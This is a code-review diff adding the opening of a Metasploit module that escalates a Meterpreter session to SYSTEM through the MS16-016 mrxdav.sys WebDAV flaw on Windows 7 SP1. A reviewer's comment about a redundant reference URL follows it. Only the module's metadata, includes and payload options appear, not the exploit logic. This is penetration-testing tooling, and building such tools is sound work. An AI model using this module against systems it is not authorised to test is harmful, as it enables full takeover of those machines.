modules/exploits/windows/local/cve-2016-0051/ms16_016_webdav.rb

```diff
@@ -0,0 +1,90 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/post/windows/reflective_dll_injection'
+require 'rex'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
+  include Msf::Post::Windows::FileInfo
+  include Msf::Post::Windows::ReflectiveDLLInjection
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'           => 'MS16-016 mrxdav.sys WebDav Local Privilege Escalation',
+      'Description'    => %q{
+        This module elevates the specified session's Meterpreter process privileges to NT AUTHORITY\SYSTEM
+        via the mrxdav.sys vulnerability described by MS16-016.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+           'Tamas Koczka', # Original Exploit
+           'William Webb <william_webb[at]rapid7.com>'  # C port and Metasploit module
+        ],
+      'Arch'           => ARCH_X86,
+      'Platform'       => 'win',
+      'SessionTypes'   => [ 'meterpreter' ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+          'DisablePayloadHandler' => 'true'
+        },
+      'Targets'        =>
+        [
+          [ 'Windows 7 SP1', { } ]
+        ],
+      'Payload'        =>
+        {
+          'Space'       => 4096,
+          'DisableNops' => true
+        },
+      'References'     =>
+        [
+          [ 'CVE', '2016-0051' ],
+          [ 'MSB', 'MS16-016'  ],
+          [ 'URL', 'http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0051' ]
```

Comment:
This doesn't look like it's needed anymore since you already have a CVE reference here?